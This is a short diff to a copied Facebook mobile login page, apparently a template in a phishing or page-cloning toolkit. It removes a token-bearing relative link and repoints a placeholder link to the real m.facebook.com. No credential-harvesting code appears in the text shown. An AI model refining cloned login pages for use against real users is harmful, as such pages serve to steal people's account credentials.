--- a/login/fb_standard/mobile.html
+++ b/login/fb_standard/mobile.html
@@ -360,7 +360,6 @@
                   <div class="_7om2 _52we _2pid _52z6">
                     <div class="_4g34">
                       <a
-                        href="/login/?privacy_mutation_token=eyJ0eXBlIjowLCJjcmVhdGlvbl90aW1lIjoxNzE0MDg4OTA2LCJjYWxsc2l0ZV9pZCI6Nzk2MTcwNzM0NTY5ODY0fQ%3D%3D&amp;refid=8"
                         ><img
                           src="https://static.xx.fbcdn.net/rsrc.php/y1/r/4lCu2zih0ca.svg"
                           width="112"
@@ -457,7 +456,7 @@
                                       "
                                       id="u_0_2_bT"
                                       data-sigil="password-plain-text-toggle">
-                                      <a href="#"
+                                      <a href="https://m.facebook.com/#"
                                         ><span
                                           class="mfss"
                                           style="display: none"
